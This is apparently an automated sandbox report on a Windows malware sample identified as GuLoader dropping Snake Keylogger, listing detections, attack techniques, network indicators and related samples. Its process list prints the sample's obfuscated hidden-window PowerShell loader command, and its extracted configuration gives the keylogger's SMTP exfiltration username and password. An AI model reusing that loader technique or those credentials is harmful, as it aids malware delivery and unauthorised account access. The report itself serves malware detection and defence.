Windows
Analysis Report
Rundholterne89.exe
Overview
General Information
Detection
- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%
Signatures
Classification
- System is w10x64
- Rundholterne89.exe (PID: 7992 cmdline: "C:\Users\user\Desktop\Rundholterne89.exe" MD5: A1E239C4D5116E289CE0597A92844EDE)
- powershell.exe (PID: 8084 cmdline: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- msiexec.exe (PID: 6624 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | |
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | |
{"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Rule | Description | Author
---|---|---
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
System Summary
- Author: frack113
- Author: frack113, Nasreddine Bencherchali (Nextron Systems)
- Author: frack113
- Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
---|---|---|---|---|---|---|---|---
2024-10-22T16:04:21.520222+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:22.954475+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:26.027860+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:28.905367+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:31.792925+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | TCP
2024-10-22T16:04:19.358399+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:20.811576+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:22.249021+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | TCP
2024-10-22T16:04:14.198153+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | TCP
AV Detection
- Avira (2 entries)
- Malware Configuration Extractor
- ReversingLabs (2 entries)
- Integrated Neural Analysis Model
Location Tracking
- DNS query
- Static PE information
- HTTPS traffic detected (4 entries)
- Static PE information
- Binary string (2 entries)
- Code function: 0_2_00406033, 0_2_004055D1
- Code function: 6_2_0031F2C0, 6_2_0031F4AC, 6_2_0031F974, 6_2_25DF2DC8, 6_2_25DF2968, 6_2_25DF0B30, 6_2_25DF0B30, 6_2_25DF2DBB, 6_2_25DFD9A8, 6_2_25DFD550, 6_2_25DF310E, 6_2_25DFD0F8, 6_2_25DFCCA0, 6_2_25DF0040, 6_2_25DFF810, 6_2_25DFF3B8, 6_2_25DFEF60, 6_2_25DFEB08, 6_2_25DFE6B0, 6_2_25DFE258, 6_2_25DFDE00
Networking
- DNS query
- TCP traffic
- HTTP traffic detected (10 entries)
- IP Address (4 entries)
- ASN Name (3 entries)
- JA3 fingerprint (3 entries)
- DNS query (2 entries)
- Suricata IDS (8 entries)
- TCP traffic
- HTTP traffic detected (12 entries)
- HTTPS traffic detected
- UDP traffic detected without corresponding DNS query (6 entries)
- HTTP traffic detected (22 entries)
- DNS traffic detected (6 entries)
- HTTP traffic detected
- String found in binary or memory (59 entries)
- Network traffic detected (24 entries)
- HTTPS traffic detected (3 entries)
- Code function: 0_2_00405086
System Summary
- File created (dropped file)
- Code function: 0_2_0040310F
- Code function: 0_2_004048C5, 0_2_004064CB, 0_2_00406CA2, 2_2_043DE260, 2_2_043DDFDD, 2_2_06DCC936, 6_2_0031C146, 6_2_0031D278, 6_2_00315362, 6_2_0031C468, 6_2_0031C738, 6_2_0031E988, 6_2_0031CA08, 6_2_0031CCD8, 6_2_00313E09, 6_2_0031CFAA, 6_2_0031F974, 6_2_0031E97A, 6_2_003169A0, 6_2_003129EC, 6_2_00319DE0, 6_2_00316FC8, 6_2_25DF2968, 6_2_25DFFC68, 6_2_25DF9C18, 6_2_25DF17A0, 6_2_25DF0B30, 6_2_25DF9328, 6_2_25DF1E80, 6_2_25DFDDF1, 6_2_25DFD999, 6_2_25DFD9A8, 6_2_25DFD550, 6_2_25DF9548, 6_2_25DFD540, 6_2_25DFD0F8, 6_2_25DFD0E9, 6_2_25DFCC8F, 6_2_25DFCCA0, 6_2_25DF0040, 6_2_25DF501B, 6_2_25DF0015, 6_2_25DFF810, 6_2_25DFF802, 6_2_25DF5028, 6_2_25DF8B91, 6_2_25DF178F, 6_2_25DFF3B8, 6_2_25DFF3A8, 6_2_25DF8BA0, 6_2_25DFEF51, 6_2_25DFEF60, 6_2_25DFEB08, 6_2_25DF0B20, 6_2_25DFEAF8, 6_2_25DFE6B0, 6_2_25DFE6A0, 6_2_25DFE258, 6_2_25DFE257, 6_2_25DF1E70, 6_2_25DFDE00
- Static PE information
- Classification label
- Code function: 0_2_0040310F
- Code function: 0_2_00404352
- Code function: 0_2_0040205E
- File created
- Mutant created (2 entries)
- File created
- Static PE information
- WMI Queries
- File read
- Key opened
- ReversingLabs
- File read
- Process created (6 entries)
- Section loaded (109 entries)
- Key value queried
- Window detected
- File opened
- Static PE information
- Binary string (2 entries)
Data Obfuscation
- File source
- Anti Malware Scan Interface (2 entries)
- Process created (2 entries)
- Code function: 2_2_043DCA8C, 2_2_043DD611, 2_2_043DD0B1, 2_2_087E41AD
- File created (dropped file)
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Code function: | 0_2_00406033 | |
Source: | Code function: | 0_2_004055D1 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | API call chain: | graph_0-3316 | ||
Source: | API call chain: | graph_0-3164 |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 6_2_002ED044 |
Source: | Process token adjusted: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created / APC Queued / Resumed: | Jump to behavior |
Source: | Thread APC queued: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 0_2_00405D51 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 2 PowerShell | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Software Packing | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 311 Process Injection | 1 DLL Side-Loading | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 1 Non-Standard Port | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 31 Virtualization/Sandbox Evasion | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
42% | ReversingLabs | Win32.Spyware.Snakekeylogger | ||
100% | Avira | TR/AVI.Inj.npwdo |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | TR/AVI.Inj.npwdo | ||
42% | ReversingLabs | Win32.Spyware.Snakekeylogger |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
drive.google.com | 142.250.185.174 | true | false | unknown | |
drive.usercontent.google.com | 142.250.186.65 | true | false | unknown | |
reallyfreegeoip.org | 188.114.97.3 | true | true | unknown | |
smtp.ionos.es | 213.165.67.118 | true | true | unknown | |
api.telegram.org | 149.154.167.220 | true | true | unknown | |
checkip.dyndns.com | 193.122.130.0 | true | false | unknown | |
checkip.dyndns.org | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | unknown | ||
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true | |
142.250.185.174 | drive.google.com | United States | 15169 | GOOGLEUS | false | |
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true | |
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false | |
213.165.67.118 | smtp.ionos.es | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true | |
142.250.186.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1539382 |
Start date and time: | 2024-10-22 16:02:09 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Rundholterne89.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/14@6/6 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Rundholterne89.exe
Time | Type | Description |
---|---|---|
10:03:14 | API Interceptor | |
10:04:19 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
188.114.97.3 | Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | PureLog Stealer | Browse | |
| Get hash | malicious | FormBook | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Amadey | Browse | |
| Get hash | malicious | Shikitega, Xmrig | Browse | |
| Get hash | malicious | FormBook | Browse | |
193.122.130.0 | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
reallyfreegeoip.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
smtp.ionos.es | Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | AgentTesla | Browse | |
| Get hash | malicious | AgentTesla | Browse | |
| Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| Get hash | malicious | AgentTesla, GuLoader | Browse | |
| Get hash | malicious | AgentTesla | Browse | |
checkip.dyndns.com | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
api.telegram.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
CLOUDFLARENETUS | Get hash | malicious | Remcos | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | PureLog Stealer | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | AgentTesla | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
ONEANDONE-ASBrauerstrasse48DE | Get hash | malicious | FormBook, PureLog Stealer | Browse | |
| Get hash | malicious | Mirai | Browse | |
| Get hash | malicious | FormBook, PureLog Stealer | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Mamba2FA | Browse | |
| Get hash | malicious | Mamba2FA | Browse | |
| Get hash | malicious | Mirai | Browse | |
| Get hash | malicious | Coinhive, Xmrig | Browse | |
ORACLE-BMC-31898US | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | |
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | FormBook, GuLoader | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | FormBook, GuLoader | Browse | |
| Get hash | malicious | AgentTesla | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| Get hash | malicious | AgentTesla | Browse | |
| Get hash | malicious | Remcos, GuLoader | Browse | |
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | FormBook, GuLoader | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | FormBook, GuLoader | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | Unknown | Browse | |
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |
| Get hash | malicious | GuLoader | Browse | |
| Get hash | malicious | FormBook, GuLoader | Browse | |
| Get hash | malicious | Remcos, GuLoader | Browse | |
| Get hash | malicious | GuLoader | Browse | |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 14744 |
Entropy (8bit): | 4.992175361088568 |
Encrypted: | false |
SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA |
MD5: | A35685B2B980F4BD3C6FD278EA661412 |
SHA1: | 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062 |
SHA-256: | 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930 |
SHA-512: | 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
